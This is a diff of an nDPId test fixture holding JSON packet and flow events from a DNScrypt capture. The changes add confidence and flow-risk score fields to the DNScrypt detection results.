 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":388,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAABQ+L4Aub0Rk4kKAAABMw980AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":388,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":39910,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":946739337048,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAAXc+MAgAL0RbrQKAAABMw980JvmEPcGBNOBaUQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":39910,"dst_port":4343,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":39910,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":390,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAABQ+MAAub0Rk4cKAAABMw980AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":390,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":391,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":53887,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":946739337048,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAAIc+MFAAL0RUnMKAAABMw980NJ\/EPcCCHK1aUEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":53887,"dst_port":4343,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":53887,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":946739337076,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739337076,"pkt":"ZmZmZmZmRERERERECABFAADWnoBAADURNfszD3zQCgAAARD3sT8Awv\/QaUWBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPvb\/epXmbtmpFJPDJPj0\/8kG2WLVy9aKZXG64Z\/RD4Asb+lk0fHUNVwKqjvyNJwSQDMlfv0kF+DU4Xf9AOufg1vl\/oZmXyGUvpIk2ki4WFZb2z8KlMPRm7olQdpuGdje2+X+hmZfIZSAAAAAV9TS2BfVJzg"}
 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":2,"flow_last_seen":946739337077,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739337077,"pkt":"ZmZmZmZmRERERERECABFAADWnoFAADURNfozD3zQCgAAARD32dgAwtc5aUOBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPvb\/epXmbtmpFJPDJPj0\/8kG2WLVy9aKZXG64Z\/RD4Asb+lk0fHUNVwKqjvyNJwSQDMlfv0kF+DU4Xf9AOufg1vl\/oZmXyGUvpIk2ki4WFZb2z8KlMPRm7olQdpuGdje2+X+hmZfIZSAAAAAV9TS2BfVJzg"}
 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":946739337077,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739337077,"pkt":"ZmZmZmZmRERERERECABFAADWnoJAADURNfkzD3zQCgAAARD3wzcAwu3baUKBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPvb\/epXmbtmpFJPDJPj0\/8kG2WLVy9aKZXG64Z\/RD4Asb+lk0fHUNVwKqjvyNJwSQDMlfv0kF+DU4Xf9AOufg1vl\/oZmXyGUvpIk2ki4WFZb2z8KlMPRm7olQdpuGdje2+X+hmZfIZSAAAAAV9TS2BfVJzg"}
 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":36930,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":946739337078,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAAIc\/chAAL0ReVsKAAABp3LcfZBCAbsCCEbGm2kBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0xAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":395,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":36930,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":395,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":36930,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":396,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":38508,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":946739337078,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAAXc\/ckgAL0RlZoKAAABp3LcfZZsAbsGBGHYm2YBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0xAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":38508,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":38508,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":397,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAABQ\/ckAub0Rum0KAAABp3LcfQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":397,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":39816,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":946739337078,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAAIc\/cpAAL0ReVkKAAABp3LcfZuIAbsCCEbGm2cBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0xAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":39816,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
